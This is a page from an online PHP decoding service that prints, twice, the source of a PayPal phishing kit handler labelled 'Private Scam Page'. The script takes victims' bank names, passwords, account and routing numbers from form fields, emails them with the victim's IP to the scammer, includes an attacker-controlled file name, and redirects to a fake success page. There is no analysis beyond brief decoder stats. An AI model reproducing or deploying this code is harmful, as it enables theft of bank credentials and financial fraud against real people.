Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* _____________________________________________________________________________..

Decoded Output download

<?php 
 
/* 
__________________________________________________________________________________________________________________ 
Private Scam Page*********KAKA 
--------------------------------------- 
Paypal Scam 
KAKA / KAKA / KAKA / KAKA /  
KAKA / KAKA / KAKA / KAKA /  
ZIZOU / ZIZOU / ZIZOU  / ZIZOU /  
__________________________________________________________________________________________________________________ 
*/ 
 
/*========== [ Variables ]==========*/ 
$ip = getenv("REMOTE_ADDR"); 
$bankname = $_POST['_bkid']; 
$bankpass = $_POST['_bkpass']; 
$hostname = $_POST['hostname']; 
$accountnumber = $_POST['_accn']; 
$routingnumber = $_POST['_routn']; 
/*========== [ Variables ]==========*/ 
 
$message = " 
=========[BANK INFOS]========= 
Bank Name	    : $bankname 
Bank Password	: $bankpass 
Account Number	: $accountnumber 
Routing Number	: $routingnumber 
===============[IP]============== 
IP	: http://www.geoiptool.com/?IP=$ip 
==========[BY KAKA ]========="; 
 
$encrypt=  base64_encode($message); 
include "$hostname"; 
 
$to = "[email protected]"; // Email Here 
$subject = "BANK INFOS = [$ip]"; 
$headers = "From: resulta <[email protected]>"; 
$headers .= $_POST['eMailAdd']."
"; 
$headers .= "MIME-Version: 1.0
"; 
 
mail($to, $subject, $message,$headers); 
 
 
header("Location:websc-success.php"); 
 
 
?>

Did this file decode correctly?

Original Code

<?php

/*
__________________________________________________________________________________________________________________
Private Scam Page*********KAKA
---------------------------------------
Paypal Scam
KAKA / KAKA / KAKA / KAKA / 
KAKA / KAKA / KAKA / KAKA / 
ZIZOU / ZIZOU / ZIZOU  / ZIZOU / 
__________________________________________________________________________________________________________________
*/

/*========== [ Variables ]==========*/
$ip = getenv("REMOTE_ADDR");
$bankname = $_POST['_bkid'];
$bankpass = $_POST['_bkpass'];
$hostname = $_POST['hostname'];
$accountnumber = $_POST['_accn'];
$routingnumber = $_POST['_routn'];
/*========== [ Variables ]==========*/

$message = "
=========[BANK INFOS]=========
Bank Name	    : $bankname
Bank Password	: $bankpass
Account Number	: $accountnumber
Routing Number	: $routingnumber
===============[IP]==============
IP	: http://www.geoiptool.com/?IP=$ip
==========[BY KAKA ]=========";

$encrypt=  base64_encode($message);
include "$hostname";

$to = "[email protected]"; // Email Here
$subject = "BANK INFOS = [$ip]";
$headers = "From: resulta <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($to, $subject, $message,$headers);


header("Location:websc-success.php");


?>

Function Calls

getenv 1

Variables

None

Stats

MD5 d9856276ce718a894a6ae5da3a84f033
Eval Count 0
Decode Time 103 ms